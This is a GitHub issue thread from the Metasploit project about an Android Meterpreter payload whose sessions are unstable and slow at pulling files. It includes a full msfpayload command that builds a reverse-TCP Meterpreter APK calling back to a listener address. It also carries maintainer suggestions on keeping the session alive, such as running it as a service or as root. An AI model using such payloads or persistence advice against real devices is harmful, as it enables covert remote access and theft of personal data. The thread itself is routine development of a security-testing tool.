### ISSUE TITLE
Android Meterpreter Error and Problems

### ISSUE THREAD

**Issue by DrDinosaur** [rapid7/metasploit-framework#5428]
I made a Android application payload: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.2.107 LPORT=443 R > test.apk (I know it's going to expire, but it doesn't really matter here). I put that on a web server and installed it with an Android 5.0 device. When I open it, I get the following error:
[-] Failed to load extension: No module of the name ext_server_android.jar found

The session still opens and you can interact with meterpreter. The session dies after a few minutes though. It's happened several times. You can open the app again to get a new session, but it's not stable. Also, it's really slow when trying to steal files. I tried to download pictures, but it only managed to grab one before the session died. This is on the same Wi-Fi network.

**Comment by bcook-r7** [comment]
Thanks, I'm in the final stages of landing the PR for the first problem, and the speed issues will be fixed soon.

**Comment by timwr** [comment]
@DrDinosaur the "No module of the name ext_server_android.jar found" is unrelated and will be fixed soon.
What device is this? I can reproduce this on a Galaxy Trend Lite.
I suspect the problem is that the OS is killing the application. If you disable the screen lock and don't touch the phone after launching the application does the session seem more reliable? Making the session run in a service instead of an activity might make the OS less likely to kill it, but it can still be killed. I suspect running a root exploit and running as root is the only way to make sure the OS can't kill the session.

**Comment by DrDinosaur** [comment]
This is on the 2014 Moto X. I didn't check not touching it, but it still died even without being put to sleep.

**Comment by bcook-r7** [comment]
The latest android meterpreter is now integrated, which solves a number of problems, including the android extension error. This issue is a bit overbroad, so I'm closing it. If there are still reliability or persistence issues, let's address them in a separate ticket.
